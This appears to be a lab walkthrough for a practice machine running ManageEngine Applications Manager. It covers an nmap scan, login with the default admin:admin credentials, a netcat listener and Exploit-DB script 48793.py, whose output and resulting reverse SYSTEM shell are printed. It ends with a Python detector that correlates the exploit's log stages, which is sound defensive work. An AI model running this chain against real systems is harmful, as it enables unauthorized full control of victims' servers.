Summary

We’ll exploit this machine through an authenticated remote code execution vulnerability in the ManageEngine Applications Manager web application, logging in with its default admin credentials. The application runs with SYSTEM privileges, so the resulting shell is SYSTEM as well.

Enumeration

Let’s start the enumeration process with an nmap scan against all 65535 TCP ports.

kali@kali:~$ sudo nmap 192.168.120.143 -p-
Starting Nmap 7.70SVN ( https://nmap.org ) at 2020-09-14 18:52 EDT
Nmap scan report for 192.168.120.143
Host is up (0.024s latency).
Not shown: 65517 filtered ports
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
5040/tcp  open  unknown
7680/tcp  open  pando-pub
12000/tcp open  cce4x
22222/tcp open  easyengine
40443/tcp open  unknown
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49668/tcp open  unknown
49669/tcp open  unknown
49670/tcp open  unknown
49689/tcp open  unknown
49719/tcp open  unknown
49815/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 137.94 seconds

Let’s focus our attention on ports 12000, 22222 and 40443 and run an nmap version scan against them. The fingerprint captured for port 40443 is an HTTP response carrying a Server: AppManager header, so this is a web application we may be able to use to gain an initial foothold.

kali@kali:~$ sudo nmap 192.168.120.143 -p12000,22222,40443 -sV
Starting Nmap 7.70SVN ( https://nmap.org ) at 2020-09-14 19:00 EDT
Nmap scan report for 192.168.120.143
Host is up (0.020s latency).

PORT      STATE SERVICE VERSION
12000/tcp open  cce4x?
22222/tcp open  ssh     OpenSSH for_Windows_8.1 (protocol 2.0)
40443/tcp open  unknown
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port12000-TCP:V=7.70SVN%I=7%D=9/14%Time=5F5FF66D%P=x86_64-unknown-linux
SF:-gnu%r(Kerberos,16,"\0\0\0\x12\0\tRECONNECT\0\x010\0\0\0\0");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port40443-TCP:V=7.70SVN%I=7%D=9/14%Time=5F5FF62E%P=x86_64-unknown-linux
SF:-gnu%r(GetRequest,246,"HTTP/1\.1\x20200\x20\r\nSet-Cookie:\x20JSESSIONI
SF:D_APM_40443=FBEC1596887D35EADBD9B4D0827530ED;\x20Path=/;\x20HttpOnly\r\
SF:nAccept-Ranges:\x20bytes\r\nETag:\x20W/\"261-1591076589000\"\r\nLast-Mo
SF:dified:\x20Tue,\x2002\x20Jun\x202020\x2005:43:09\x20GMT\r\nContent-Type
SF::\x20text/html\r\nContent-Length:\x20261\r\nDate:\x20Mon,\x2014\x20Sep\
SF:x202020\x2023:01:02\x20GMT\r\nConnection:\x20close\r\nServer:\x20AppMan
SF:ager\r\n\r\n<!--\x20\$Id\$\x20-->\n<!DOCTYPE\x20HTML\x20PUBLIC\x20\"-//
SF:W3C//DTD\x20HTML\x204\.01\x20Transitional//EN\">\n<html>\n<head>\n<!--\
SF:x20This\x20comment\x20is\x20for\x20Instant\x20Gratification\x20to\x20wo
SF:rk\x20applications\.do\x20-->\n<script>\n\n\twindow\.open\(\"/webclient
SF:/common/jsp/home\.jsp\",\x20\"_top\"\);\n\n</script>\n\n</head>\n</html
SF:>\n")%r(HTTPOptions,841,"HTTP/1\.1\x20403\x20\r\nSet-Cookie:\x20JSESSIO
SF:NID_APM_40443=69F37E89F7AAFB54BF3F4C054B21F5EF;\x20Path=/;\x20HttpOnly\
...

Navigating to the port with our web browser presents the ManageEngine Applications Manager web app, running Build No. 14700.

A search of Exploit-DB (EDB) for this version returns an authenticated RCE exploit, the 48793.py script used below.

Knowing that this exploit requires credentials, we run a quick online search for ManageEngine default credentials. The first result confirms that the default credentials for this application are admin:admin, which we’ll include in the get_valid_cookie section of the exploit.

Exploitation

ManageEngine Authenticated Remote Code Execution

To begin our exploitation process, we’ll start a netcat listener on port 443.

kali@kali:~$ sudo nc -nlvp 443
listening on [any] 443 ...

Running the exploit results in a SYSTEM shell:

kali@kali:~$ python3 48793.py http://192.168.120.143:40443 admin admin 192.168.118.11 443
[*] Visiting page to retrieve initial cookies...
[*] Retrieving admin cookie...
[*] Getting base directory of ManageEngine...
[*] Found base directory: C:\Program Files\ManageEngine\AppManager14
[*] Creating JAR file...
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
added manifest
adding: weblogic/jndi/Environment.class(in = 1844) (out= 1078)(deflated 41%)
[*] Uploading JAR file...
[*] Attempting to upload JAR directly to targeted Weblogic folder...
[!] Failed to upload JAR directly, continue to add and execute job to move JAR...
[*] Creating a task to move the JAR file to relative path: classes/weblogic/version8/...
[*] Found actionname: move_weblogic_jar4825 with found actionid 10000003
[*] Executing created task with id: 10000003 to copy JAR...
[*] Task 10000003 has been executed successfully
[*] Deleting created task as JAR has been copied...
[*] Running the Weblogic credentialtest which triggers the code in the JAR...
[*] Check your shell...

kali@kali:~$ sudo nc -nlvp 443
listening on [any] 443 ...
connect to [192.168.118.11] from (UNKNOWN) [192.168.120.143] 50213
Microsoft Windows [Version 10.0.18362.1082]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\Program Files\ManageEngine\AppManager14\working>whoami
whoami
nt authority\system

C:\Program Files\ManageEngine\AppManager14\working>
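The exploit output above leaves a recognisable trail on the application side: an admin login from a remote address, a JAR upload aimed at the weblogic classes folder, a task created with an action name of the form move_weblogic_jar followed by digits, execution of that task, and finally a Weblogic credential test that triggers the code. The following Python example, added here and not part of the original walkthrough or of ManageEngine's product, correlates those stages per source address within a short time window. The "timestamp | source | event | detail" log format and the SAMPLE_LOG lines are constructed for the example and are not ManageEngine's real audit log format; the indicators themselves come from the exploit output above.

```python
"""Correlate the JAR-upload / mover-task / credential-test chain per source address."""
import re
from datetime import datetime, timedelta

# Constructed sample log in a hypothetical "timestamp | source | event | detail" format.
# The first block mirrors the stages printed by the exploit above; the second is benign
# administrative activity that must not raise an alert.
SAMPLE_LOG = """\
2020-09-14 23:01:02 | 192.168.118.11 | LOGIN_OK | user=admin
2020-09-14 23:01:05 | 192.168.118.11 | FILE_UPLOAD | name=Environment.jar target=classes/weblogic/version8/
2020-09-14 23:01:06 | 192.168.118.11 | TASK_CREATE | actionname=move_weblogic_jar4825 actionid=10000003
2020-09-14 23:01:07 | 192.168.118.11 | TASK_EXECUTE | actionid=10000003
2020-09-14 23:01:08 | 192.168.118.11 | TASK_DELETE | actionid=10000003
2020-09-14 23:01:09 | 192.168.118.11 | CREDENTIAL_TEST | type=weblogic
2020-09-14 23:30:00 | 10.0.0.5 | LOGIN_OK | user=opsuser
2020-09-14 23:30:10 | 10.0.0.5 | TASK_CREATE | actionname=nightly_cleanup actionid=10000004
"""

LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d) \| (?P<src>\S+) \| (?P<event>\w+) \| (?P<detail>.*)$"
)
# Action name pattern seen in the exploit output: move_weblogic_jar followed by digits.
MOVER_TASK_RE = re.compile(r"actionname=move_weblogic_jar\d+")
ACTION_ID_RE = re.compile(r"actionid=(\d+)")


def parse_line(line):
    """Parse one constructed log line into a dict, or return None if it does not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return {
        "ts": datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S"),
        "src": m["src"],
        "event": m["event"],
        "detail": m["detail"],
    }


def classify(entry, mover_ids):
    """Map a parsed entry to a stage of the chain, or None if it is unrelated.

    mover_ids collects the action ids of suspicious mover tasks so that a later
    TASK_EXECUTE can be tied back to the task that moved the JAR.
    """
    event, detail = entry["event"], entry["detail"]
    fields = detail.split()
    if event == "LOGIN_OK" and "user=admin" in fields:
        return "admin_login"
    if event == "FILE_UPLOAD" and "weblogic" in detail.lower():
        return "jar_upload"
    if event == "TASK_CREATE" and MOVER_TASK_RE.search(detail):
        m = ACTION_ID_RE.search(detail)
        if m:
            mover_ids.add(m.group(1))
        return "mover_task"
    if event == "TASK_EXECUTE":
        m = ACTION_ID_RE.search(detail)
        if m and m.group(1) in mover_ids:
            return "mover_run"
    if event == "CREDENTIAL_TEST" and "type=weblogic" in fields:
        return "trigger"
    return None


def detect_jar_chain(lines, window=timedelta(minutes=10)):
    """Return one alert per source that uploads/moves a JAR and then runs the
    weblogic credential test within `window`. Lines are expected in time order."""
    per_src = {}
    alerts = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        state = per_src.setdefault(
            entry["src"], {"stages": {}, "mover_ids": set(), "fired": False}
        )
        stage = classify(entry, state["mover_ids"])
        if stage is None:
            continue
        # Forget stages that fell outside the correlation window, then record this one.
        state["stages"] = {s: t for s, t in state["stages"].items() if entry["ts"] - t <= window}
        state["stages"][stage] = entry["ts"]
        seen = state["stages"]
        # The trigger alone is legitimate admin activity; require the staging step too.
        if not state["fired"] and "trigger" in seen and ("jar_upload" in seen or "mover_task" in seen):
            state["fired"] = True
            alerts.append({
                "source": entry["src"],
                "stages": sorted(seen),
                "first": min(seen.values()),
                "last": max(seen.values()),
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_jar_chain(SAMPLE_LOG.splitlines()):
        print(f"ALERT {alert['source']}: {', '.join(alert['stages'])} "
              f"between {alert['first']} and {alert['last']}")
```

The credential test on its own is normal administrator behaviour, so the rule only fires once a source has also uploaded a file into a weblogic path or created a mover task; tying TASK_EXECUTE to the ids of those tasks keeps unrelated scheduled jobs, like the nightly_cleanup task in the sample, out of the alert. The same structure applies to a real audit log once parse_line is adapted to its format.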